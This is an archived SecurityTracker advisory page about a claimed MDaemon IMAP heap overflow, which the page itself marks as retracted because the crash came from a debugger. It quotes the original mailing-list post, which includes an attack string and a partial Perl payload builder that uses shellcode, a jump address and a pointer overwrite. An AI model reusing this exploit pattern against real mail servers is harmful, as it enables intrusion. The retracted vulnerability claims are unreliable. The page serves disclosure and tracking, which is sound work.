SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Application (E-mail Server)  >   MDaemon (Alt-N) Vendors:   Alt-N Technologies
[Not a Vulnerability] MDaemon Heap Overflow in IMAP Service Lets Remote Authenticated Users Execute Arbitrary Code
SecurityTracker Alert ID:  1016167
SecurityTracker URL:  http://securitytracker.com/id/1016167
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Updated:  Jun 7 2006
Original Entry Date:  May 28 2006
Impact:   Execution of arbitrary code via network, User access via network

Version(s): 9.0.1; possibly other versions
Description:   A vulnerability was reported in MDaemon. A remote authenticated user can execute arbitrary code on the target system. [Editor's note: The original report has been retracted. There is no vulnerability. This Alert will be deleted from our database shortly.]

A remote authenticated user can send specially crafted data to the IMAP service to trigger a buffer overflow and execute arbitrary code on the target system. The code will run with the privileges of the target service.

A demonstration exploit command is provided:

a001 "[99555 characters]\r\n

kcope discovered this vulnerability.

[Editor's note: kcope has retracted the vulnerability report. The original vulnerable behavior that was observed was introduced by the debugger used to monitor the process. Without the debugger, there is no vulnerability.]
Impact:   No impact.

[Editor's note: The original report has been retracted. There is no vulnerability. This Alert will be deleted from our database shortly.]
Solution:   [Editor's note: The original report has been retracted. There is no vulnerability. This Alert will be deleted from our database shortly.]
Vendor URL:  www.altn.com/ (Links to External Site)
Cause:   Boundary error
Underlying OS:   Windows (Any)

Message History:   None.

 Source Message Contents
Date:  Sun, 28 May 2006 15:24:30 +0200
Subject:  [Full-disclosure] *zeroday warez* MDAEMON LATEST VERSION PREAUTH

MDAEMON LATEST VERSION PREAUTH *REMOTE ROOT HOLE*

zeroday discovered by kcope kingcope[at]gmx.net !!!
shouts to alex,wY!,bogus,revoguard,adizeone

Description
There's a remotely exploitable preauthentication hole in Alt-N MDaemon.
It is a Heap Overflow in the IMAP Daemon.
It can be triggered by sending the following attack string:
a001 "[X]\r\n
Look specifically at the " it is important :)
[X] consists of f.e. 99555 Z's to reach the 4 byte overwrite.
Now one can use the 4 byte overwrite in some PEB pointer overwrite to
open a remote shell. UnhandledExceptionFilter is also possible I think.
No exploit is delivered at this time, figure it out yourself (use the 
PEB Lock) :)

Sample code:
 $where = "\x4c\x14\xed\x77"; # UnhandledExceptionFilter 77ED144C
 #$where = "\x20\xf0\xfd\x7f"; # PEB Lock Pointer 7FFDF000
 $what = "\x3d\xb9\x82\x02"; # JMP EDX 03bfcb9A
 
 $nops = "A" x 100;
 $a = $nops . $shellcode . ("Z" x 
(0x2006-length($shellcode)-length($nops))) . $what . $where . ("Z" x 
(0x184AC - 0x200A - 12));
 print $sock "a001 \"$a\r\n";
 close($sock);

Best Regards,
kcope

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2012, SecurityGlobal.net LLC